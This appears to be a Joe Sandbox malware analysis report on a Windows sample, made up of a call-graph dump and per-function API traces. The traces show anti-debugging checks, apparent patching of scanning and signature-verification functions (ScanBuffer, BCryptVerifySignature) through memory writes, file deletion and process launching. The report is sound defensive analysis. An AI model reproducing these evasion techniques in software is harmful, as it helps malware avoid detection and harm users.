77297->77298 77299 2d347ec 11 API calls 77298->77299 77300 2d4eeab 77299->77300 77301 2d4894c 21 API calls 77300->77301 77302 2d4eec0 77301->77302 77303 2d4894c 21 API calls 77302->77303 77304 2d4eed1 77303->77304 77305 2d4894c 21 API calls 77304->77305 77305->77256 77307 2d349a4 77306->77307 77307->75685 77309 2d48973 GetProcAddress 77308->77309 77310 2d489bb 77308->77310 77311 2d489b0 FreeLibrary 77309->77311 77312 2d4898d 77309->77312 77310->75745 77311->77310 77313 2d47d78 18 API calls 77312->77313 77314 2d489a5 77313->77314 77314->77311 77316 2d34f20 SysAllocStringLen 77315->77316 77317 2d4dc16 RtlI 77316->77317 77319 2d4dc3a 77317->77319 77320 2d4dc41 RtlDosPathNameToNtPathName_U 77319->77320 77570 2d4dbdc 77320->77570 77322 2d4dc5d NtDeleteFile 77323 2d4dc75 77322->77323 77324 2d34c60 SysFreeString 77323->77324 77325 2d4dc7d 77324->77325 77325->75983 77333 2d4e3ba 77326->77333 77327 2d4e45c 77328 2d34bcc 11 API calls 77327->77328 77329 2d4e471 77328->77329 77330 2d34530 11 API calls 77329->77330 77332 2d4e47c 77330->77332 77335 2d344dc 11 API calls 77332->77335 77333->77327 77571 2d346c4 11 API calls 77333->77571 77572 2d34530 11 API calls 77333->77572 77336 2d4e491 77335->77336 77337 2d34500 11 API calls 77336->77337 77338 2d4e49e 77337->77338 77338->76064 77340 2d37adc 77339->77340 77341 2d37afd 77340->77341 77573 2d37660 42 API calls 77340->77573 77343 2d4f16c 77341->77343 77344 2d4f189 77343->77344 77345 2d4f1e7 77344->77345 77574 2d346c4 11 API calls 77344->77574 77575 2d34530 11 API calls 77344->77575 77346 2d344dc 11 API calls 77345->77346 77348 2d4f1fc 77346->77348 77349 2d344dc 11 API calls 77348->77349 77351 2d4f204 77349->77351 77351->76082 77353 2d34530 11 API calls 77352->77353 77356 2d4f11c 77353->77356 77354 2d4f163 77354->76112 77355 2d349f8 11 API calls 77355->77356 77356->77354 77356->77355 77358 2d349a0 77357->77358 77359 2d37e66 GetFileAttributesA 77358->77359 77360 2d37e71 77359->77360 77360->76149 77360->76158 77362 2d34530 11 API calls 77361->77362 77363 2d485df 77362->77363 77364 2d34860 11 API calls 77363->77364 77365 2d485fe 77364->77365 77366 2d481cc 17 API calls 77365->77366 77367 2d48611 77366->77367 77368 2d48274 15 API calls 77367->77368 77369 2d48617 WinExec 77368->77369 77370 2d48639 77369->77370 77371 2d344dc 11 API calls 77370->77371 77372 2d48641 77371->77372 77372->76449 77576 2d45be8 77373->77576 77375 2d44dee 77580 2d37de0 WriteFile 77375->77580 77376 2d44e09 77376->76951 77379 2d4d16d 77378->77379 77379->77379 77380 2d34860 11 API calls 77379->77380 77381 2d4d1af 77380->77381 77382 2d347ec 11 API calls 77381->77382 77383 2d4d1d4 77382->77383 77384 2d489d0 20 API calls 77383->77384 77385 2d4d1ef 77384->77385 77386 2d34860 11 API calls 77385->77386 77387 2d4d208 77386->77387 77388 2d347ec 11 API calls 77387->77388 77389 2d4d22d 77388->77389 77390 2d489d0 20 API calls 77389->77390 77391 2d4d248 77390->77391 77392 2d34860 11 API calls 77391->77392 77393 2d4d261 77392->77393 77394 2d347ec 11 API calls 77393->77394 77395 2d4d286 77394->77395 77396 2d489d0 20 API calls 77395->77396 77397 2d4d2a1 77396->77397 77398 2d34860 11 API calls 77397->77398 77399 2d4d2ba 77398->77399 77400 2d347ec 11 API calls 77399->77400 77401 2d4d2df 77400->77401 77402 2d489d0 20 API calls 77401->77402 77403 2d4d2fa 77402->77403 77404 2d34860 11 API calls 77403->77404 77405 2d4d313 77404->77405 77406 2d347ec 11 API calls 77405->77406 77407 2d4d338 77406->77407 77408 2d489d0 20 API calls 77407->77408 77409 2d4d353 77408->77409 77410 2d34860 11 API calls 77409->77410 77411 2d4d36c 77410->77411 77412 2d347ec 11 API calls 77411->77412 77413 2d4d391 77412->77413 77414 2d489d0 20 API calls 77413->77414 77415 2d4d3ac 77414->77415 77416 2d34860 11 API calls 77415->77416 77417 2d4d3c5 77416->77417 77418 2d347ec 11 API calls 77417->77418 77419 2d4d3ea 77418->77419 77420 2d489d0 20 API calls 77419->77420 77421 2d4d405 77420->77421 77422 2d34860 11 API calls 77421->77422 77423 2d4d421 77422->77423 77424 2d347ec 11 API calls 77423->77424 77425 2d4d44c 77424->77425 77426 2d489d0 20 API calls 77425->77426 77427 2d4d470 77426->77427 77428 2d34860 11 API calls 77427->77428 77429 2d4d48c 77428->77429 77430 2d347ec 11 API calls 77429->77430 77431 2d4d4bd 77430->77431 77432 2d489d0 20 API calls 77431->77432 77433 2d4d4e1 77432->77433 77434 2d4d558 77433->77434 77436 2d34860 11 API calls 77433->77436 77435 2d34860 11 API calls 77434->77435 77437 2d4d574 77435->77437 77438 2d4d503 77436->77438 77439 2d347ec 11 API calls 77437->77439 77440 2d347ec 11 API calls 77438->77440 77442 2d4d5a5 77439->77442 77441 2d4d534 77440->77441 77444 2d489d0 20 API calls 77441->77444 77443 2d489d0 20 API calls 77442->77443 77445 2d4d5c9 77443->77445 77444->77434 77446 2d34860 11 API calls 77445->77446 77447 2d4d5e5 77446->77447 77448 2d347ec 11 API calls 77447->77448 77449 2d4d616 77448->77449 77450 2d489d0 20 API calls 77449->77450 77451 2d4d63a 77450->77451 77452 2d34860 11 API calls 77451->77452 77453 2d4d656 77452->77453 77454 2d347ec 11 API calls 77453->77454 77455 2d4d687 77454->77455 77456 2d489d0 20 API calls 77455->77456 77457 2d4d6ab 77456->77457 77458 2d32ee0 2 API calls 77457->77458 77459 2d4d6b0 77458->77459 77460 2d34860 11 API calls 77459->77460 77461 2d4d6e0 77460->77461 77462 2d347ec 11 API calls 77461->77462 77463 2d4d711 77462->77463 77464 2d489d0 20 API calls 77463->77464 77465 2d4d735 77464->77465 77466 2d34860 11 API calls 77465->77466 77467 2d4d751 77466->77467 77468 2d347ec 11 API calls 77467->77468 77469 2d4d782 77468->77469 77470 2d489d0 20 API calls 77469->77470 77471 2d4d7a6 77470->77471 77613 2d47a2c 77471->77613 77474 2d4d835 77475 2d34860 11 API calls 77474->77475 77477 2d4d851 77475->77477 77476 2d34860 11 API calls 77478 2d4d7e0 77476->77478 77479 2d347ec 11 API calls 77477->77479 77480 2d347ec 11 API calls 77478->77480 77481 2d4d882 77479->77481 77482 2d4d811 77480->77482 77483 2d489d0 20 API calls 77481->77483 77484 2d489d0 20 API calls 77482->77484 77485 2d4d8a6 77483->77485 77484->77474 77486 2d34860 11 API calls 77485->77486 77487 2d4d8c2 77486->77487 77488 2d347ec 11 API calls 77487->77488 77489 2d4d8f3 77488->77489 77490 2d489d0 20 API calls 77489->77490 77491 2d4d917 77490->77491 77492 2d47d78 18 API calls 77491->77492 77493 2d4d92f 77492->77493 77494 2d34860 11 API calls 77493->77494 77519->76855 77520->76899 77521->76356 77522->76556 77524 2d349ac 77523->77524 77525 2d345a0 11 API calls 77524->77525 77527 2d349e7 77524->77527 77526 2d349c3 77525->77526 77526->77527 77627 2d32c2c 11 API calls 77526->77627 77529 2d47e50 17 API calls 77527->77529 77529->76621 77530->76792 77531->76371 77532->77141 77533->77141 77535 2d34f26 SysAllocStringLen 77534->77535 77536 2d34f3c 77534->77536 77535->77536 77537 2d34c30 77535->77537 77536->77155 77537->77534 77538->77158 77540 2d34c66 SysFreeString 77539->77540 77541 2d34c74 77539->77541 77540->77541 77541->77165 77543 2d37f3f 77542->77543 77558 2d34a00 77543->77558 77547 2d34530 11 API calls 77546->77547 77548 2d487ab 77547->77548 77549 2d34860 11 API calls 77548->77549 77550 2d487ca 77549->77550 77551 2d481cc 17 API calls 77550->77551 77552 2d487dd 77551->77552 77553 2d48274 15 API calls 77552->77553 77554 2d487e3 CreateProcessAsUserW 77553->77554 77555 2d48827 77554->77555 77556 2d344dc 11 API calls 77555->77556 77557 2d4882f 77556->77557 77557->77213 77559 2d34a32 77558->77559 77561 2d34a05 77558->77561 77560 2d344dc 11 API calls 77559->77560 77564 2d34a28 77560->77564 77561->77559 77562 2d34a19 77561->77562 77565 2d345cc 77562->77565 77564->77210 77566 2d345a0 11 API calls 77565->77566 77567 2d345dc 77566->77567 77568 2d344dc 11 API calls 77567->77568 77569 2d345f4 77568->77569 77569->77564 77570->77322 77571->77333 77572->77333 77573->77341 77574->77344 77575->77344 77577 2d45bf1 77576->77577 77582 2d45c2c 77577->77582 77579 2d45c0d 77579->77375 77581 2d37dfd 77580->77581 77581->77376 77583 2d45c47 77582->77583 77584 2d45cec 77583->77584 77585 2d45c6e 77583->77585 77609 2d37d5c CreateFileA 77584->77609 77587 2d45c87 CreateFileA 77585->77587 77588 2d45c98 77587->77588 77590 2d45ce5 77588->77590 77606 2d37f98 12 API calls 77588->77606 77589 2d45cf6 77589->77590 77610 2d37f98 12 API calls 77589->77610 77591 2d34530 11 API calls 77590->77591 77594 2d45d59 77591->77594 77599 2d34500 11 API calls 77594->77599 77595 2d45d11 GetLastError 77611 2d3a778 12 API calls 77595->77611 77596 2d45cac GetLastError 77607 2d3a778 12 API calls 77596->77607 77603 2d45d73 77599->77603 77600 2d45d28 77612 2d3b084 42 API calls 77600->77612 77601 2d45cc3 77608 2d3b084 42 API calls 77601->77608 77603->77579 77605 2d45d4a 77605->77590 77606->77596 77607->77601 77608->77590 77609->77589 77610->77595 77611->77600 77612->77605 77614 2d34530 11 API calls 77613->77614 77615 2d47a51 77614->77615 77616 2d4798c 12 API calls 77615->77616 77617 2d47a5e 77616->77617 77618 2d347ec 11 API calls 77617->77618 77619 2d47a6b 77618->77619 77620 2d481cc 17 API calls 77619->77620 77621 2d47a7e 77620->77621 77622 2d48274 15 API calls 77621->77622 77623 2d47a84 NtAllocateVirtualMemory 77622->77623 77624 2d47ab5 77623->77624 77625 2d34500 11 API calls 77624->77625 77626 2d47ac2 77625->77626 77626->77474 77626->77476 77627->77527 77628 2d5d2fc 77638 2d3656c 77628->77638 77632 2d5d32a 77643 2d5c35c timeSetEvent 77632->77643 77634 2d5d334 77635 2d5d342 GetMessageA 77634->77635 77636 2d5d336 TranslateMessage DispatchMessageA 77635->77636 77637 2d5d352 77635->77637 77636->77635 77639 2d36577 77638->77639 77644 2d34198 77639->77644 77642 2d342ac SysFreeString SysReAllocStringLen SysAllocStringLen 77642->77632 77643->77634 77645 2d341de 77644->77645 77646 2d34257 77645->77646 77647 2d343e8 77645->77647 77658 2d34130 77646->77658 77650 2d34419 77647->77650 77653 2d3442a 77647->77653 77663 2d3435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 77650->77663 77652 2d34423 77652->77653 77654 2d3446f FreeLibrary 77653->77654 77655 2d34493 77653->77655 77654->77653 77656 2d344a2 ExitProcess 77655->77656 77657 2d3449c 77655->77657 77657->77656 77659 2d34173 77658->77659 77660 2d34140 77658->77660 77659->77642 77660->77659 77664 2d35868 77660->77664 77668 2d315cc 77660->77668 77663->77652 77665 2d35878 GetModuleFileNameA 77664->77665 77667 2d35894 77664->77667 77672 2d35acc GetModuleFileNameA RegOpenKeyExA 77665->77672 77667->77660 77691 2d31560 77668->77691 77670 2d315d4 VirtualAlloc 77671 2d315eb 77670->77671 77671->77660 77673 2d35b4f 77672->77673 77674 2d35b0f RegOpenKeyExA 77672->77674 77690 2d35908 12 API calls 77673->77690 77674->77673 77676 2d35b2d RegOpenKeyExA 77674->77676 77676->77673 77678 2d35bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 77676->77678 77677 2d35b74 RegQueryValueExA 77679 2d35bb2 RegCloseKey 77677->77679 77680 2d35b94 RegQueryValueExA 77677->77680 77681 2d35cf2 77678->77681 77682 2d35c0f 77678->77682 77679->77667 77680->77679 77681->77667 77682->77681 77684 2d35c1f lstrlenA 77682->77684 77685 2d35c37 77684->77685 77685->77681 77686 2d35c84 77685->77686 77687 2d35c5c lstrcpynA LoadLibraryExA 77685->77687 77686->77681 77688 2d35c8e lstrcpynA LoadLibraryExA 77686->77688 77687->77686 77688->77681 77689 2d35cc0 lstrcpynA LoadLibraryExA 77688->77689 77689->77681 77690->77677 77692 2d31500 77691->77692 77692->77670 77693 2d34edc 77694 2d34ee9 77693->77694 77698 2d34ef0 77693->77698 77699 2d34c38 77694->77699 77705 2d34c50 77698->77705 77700 2d34c4c 77699->77700 77701 2d34c3c SysAllocStringLen 77699->77701 77700->77698 77701->77700 77702 2d34c30 77701->77702 77703 2d34f26 SysAllocStringLen 77702->77703 77704 2d34f3c 77702->77704 77703->77702 77703->77704 77704->77698 77706 2d34c56 SysFreeString 77705->77706 77707 2d34c5c 77705->77707 77706->77707 77708 2d31c6c 77709 2d31d04 77708->77709 77710 2d31c7c 77708->77710 77713 2d31f58 77709->77713 77714 2d31d0d 77709->77714 77711 2d31cc0 77710->77711 77712 2d31c89 77710->77712 77715 2d31724 10 API calls 77711->77715 77716 2d31c94 77712->77716 77756 2d31724 77712->77756 77717 2d31fec 77713->77717 77721 2d31f68 77713->77721 77722 2d31fac 77713->77722 77718 2d31d25 77714->77718 77732 2d31e24 77714->77732 77737 2d31cd7 77715->77737 77723 2d31d2c 77718->77723 77728 2d31d48 77718->77728 77729 2d31dfc 77718->77729 77720 2d31e7c 77727 2d31724 10 API calls 77720->77727 77745 2d31e95 77720->77745 77726 2d31724 10 API calls 77721->77726 77725 2d31fb2 77722->77725 77730 2d31724 10 API calls 77722->77730 77724 2d31cfd 77744 2d31f82 77726->77744 77742 2d31f2c 77727->77742 77736 2d31d79 Sleep 77728->77736 77746 2d31d9c 77728->77746 77733 2d31724 10 API calls 77729->77733 77748 2d31fc1 77730->77748 77731 2d31cb9 77732->77720 77735 2d31e55 Sleep 77732->77735 77732->77745 77749 2d31e05 77733->77749 77734 2d31fa7 77735->77720 77738 2d31e6f Sleep 77735->77738 77739 2d31d91 Sleep 77736->77739 77736->77746 77737->77724 77743 2d31a8c 8 API calls 77737->77743 77738->77732 77739->77728 77740 2d31ca1 77740->77731 77780 2d31a8c 77740->77780 77741 2d31e1d 77742->77745 77750 2d31a8c 8 API calls 77742->77750 77743->77724 77744->77734 77751 2d31a8c 8 API calls 77744->77751 77748->77734 77754 2d31a8c 8 API calls 77748->77754 77749->77741 77752 2d31a8c 8 API calls 77749->77752 77753 2d31f50 77750->77753 77751->77734 77752->77741 77755 2d31fe4 77754->77755 77757 2d31968 77756->77757 77767 2d3173c 77756->77767 77758 2d31938 77757->77758 77759 2d31a80 77757->77759 77764 2d31947 Sleep 77758->77764 77766 2d31986 77758->77766 77761 2d31684 VirtualAlloc 77759->77761 77762 2d31a89 77759->77762 77760 2d3175d 77760->77740 77763 2d316af 77761->77763 77773 2d316bf 77761->77773 77762->77740 77797 2d31644 77763->77797 77764->77766 77770 2d3195d Sleep 77764->77770 77765 2d3174e 77765->77760 77768 2d3182c 77765->77768 77772 2d3180a Sleep 77765->77772 77775 2d315cc VirtualAlloc 77766->77775 77778 2d319a4 77766->77778 77767->77765 77771 2d317cb Sleep 77767->77771 77777 2d315cc VirtualAlloc 77768->77777 77779 2d31838 77768->77779 77770->77758 77771->77765 77774 2d317e4 Sleep 77771->77774 77772->77768 77776 2d31820 Sleep 77772->77776 77773->77740 77774->77767 77775->77778 77776->77765 77777->77779 77778->77740 77779->77740 77781 2d31aa1 77780->77781 77782 2d31b6c 77780->77782 77784 2d31aa7 77781->77784 77787 2d31b13 Sleep 77781->77787 77783 2d316e8 77782->77783 77782->77784 77786 2d31c66 77783->77786 77789 2d31644 2 API calls 77783->77789 77785 2d31ab0 77784->77785 77788 2d31b4b Sleep 77784->77788 77793 2d31b81 77784->77793 77785->77731 77786->77731 77787->77784 77790 2d31b2d Sleep 77787->77790 77791 2d31b61 Sleep 77788->77791 77788->77793 77792 2d316f5 VirtualFree 77789->77792 77790->77781 77791->77784 77794 2d3170d 77792->77794 77795 2d31c00 VirtualFree 77793->77795 77796 2d31ba4 77793->77796 77794->77731 77795->77731 77796->77731 77798 2d31681 77797->77798 77799 2d3164d 77797->77799 77798->77773 77799->77798 77800 2d3164f Sleep 77799->77800 77801 2d31664 77800->77801 77801->77798 77802 2d31668 Sleep 77801->77802 77802->77799

                                                                                                                        Executed Functions

                                                                                                                        Function 02D35ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 9232 2d35acc-2d35b0d GetModuleFileNameA RegOpenKeyExA 9233 2d35b4f-2d35b92 call 2d35908 RegQueryValueExA 9232->9233 9234 2d35b0f-2d35b2b RegOpenKeyExA 9232->9234 9239 2d35bb6-2d35bd0 RegCloseKey 9233->9239 9240 2d35b94-2d35bb0 RegQueryValueExA 9233->9240 9234->9233 9236 2d35b2d-2d35b49 RegOpenKeyExA 9234->9236 9236->9233 9238 2d35bd8-2d35c09 lstrcpynA GetThreadLocale GetLocaleInfoA 9236->9238 9241 2d35cf2-2d35cf9 9238->9241 9242 2d35c0f-2d35c13 9238->9242 9240->9239 9243 2d35bb2 9240->9243 9245 2d35c15-2d35c19 9242->9245 9246 2d35c1f-2d35c35 lstrlenA 9242->9246 9243->9239 9245->9241 9245->9246 9247 2d35c38-2d35c3b 9246->9247 9248 2d35c47-2d35c4f 9247->9248 9249 2d35c3d-2d35c45 9247->9249 9248->9241 9251 2d35c55-2d35c5a 9248->9251 9249->9248 9250 2d35c37 9249->9250 9250->9247 9252 2d35c84-2d35c86 9251->9252 9253 2d35c5c-2d35c82 lstrcpynA LoadLibraryExA 9251->9253 9252->9241 9254 2d35c88-2d35c8c 9252->9254 9253->9252 9254->9241 9255 2d35c8e-2d35cbe lstrcpynA LoadLibraryExA 9254->9255 9255->9241 9256 2d35cc0-2d35cf0 lstrcpynA LoadLibraryExA 9255->9256 9256->9241
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D30000,02D5E790), ref: 02D35AE8
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B06
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B24
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D35B42
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D35B8B
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02D35D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001), ref: 02D35BA9
                                                                                                                        • RegCloseKey.ADVAPI32(?,02D35BD8,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D35BCB
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D35BE8
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D35BF5
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D35BFB
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D35C26
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35C6D
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35C7D
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35CA5
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35CB5
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D35CDB
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D35CEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                        • Opcode ID: 2dbba8a81f5606dabf08fa30b30678177b1ca9abe34338acb7f2e258a3643ffd
                                                                                                                        • Instruction ID: af31052ee16eb04dd3f6bb677c83e0e38fb1b1c24a9c9576346dd95892cdadc5
                                                                                                                        • Opcode Fuzzy Hash: 2dbba8a81f5606dabf08fa30b30678177b1ca9abe34338acb7f2e258a3643ffd
                                                                                                                        • Instruction Fuzzy Hash: BF517775A4025D7AFB22D6A4DC46FEF77ADDB08744F8041A1AA04E6281D774DE44CF70
                                                                                                                        Function 02D4894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 11492 2d4894c-2d48971 LoadLibraryW 11493 2d48973-2d4898b GetProcAddress 11492->11493 11494 2d489bb-2d489c1 11492->11494 11495 2d489b0-2d489b6 FreeLibrary 11493->11495 11496 2d4898d-2d489ac call 2d47d78 11493->11496 11495->11494 11496->11495 11499 2d489ae 11496->11499 11499->11495
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                        • Opcode ID: fe827b1dee6edee07b4021f4c6e84a2b8d2a71865e55388f815b74edc99dbcba
                                                                                                                        • Instruction ID: 2ac33b1b1f682402b5783fa6f8e06e4ef060739b33c4453d5269560c41762f0e
                                                                                                                        • Opcode Fuzzy Hash: fe827b1dee6edee07b4021f4c6e84a2b8d2a71865e55388f815b74edc99dbcba
                                                                                                                        • Instruction Fuzzy Hash: F3F08C72AC1244EFF312AA68EC59B96B79CE7C1694F000969A9AA97380CB705C50CB60
                                                                                                                        Function 02D4F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 11509 2d4f744-2d4f75e GetModuleHandleW 11510 2d4f760-2d4f772 GetProcAddress 11509->11510 11511 2d4f78a-2d4f792 11509->11511 11510->11511 11512 2d4f774-2d4f784 CheckRemoteDebuggerPresent 11510->11512 11512->11511 11513 2d4f786 11512->11513 11513->11511
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02D4F754
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D4F766
                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D4F77D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                        • Opcode ID: fcb99e2d635ab80d87aa436cb0c3793fead6110f32604764613cc9fbbb3573b7
                                                                                                                        • Instruction ID: 57acb5a526a32205496e86d799047623d7c26f0a248110121c9695ec5c7ab8bd
                                                                                                                        • Opcode Fuzzy Hash: fcb99e2d635ab80d87aa436cb0c3793fead6110f32604764613cc9fbbb3573b7
                                                                                                                        • Instruction Fuzzy Hash: 28F02730900248BFEB00A7B88888BDCFBA89F05329F2403D0D470622E1EB790A44CAA5
                                                                                                                        Function 02D4DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDAB
                                                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDDB
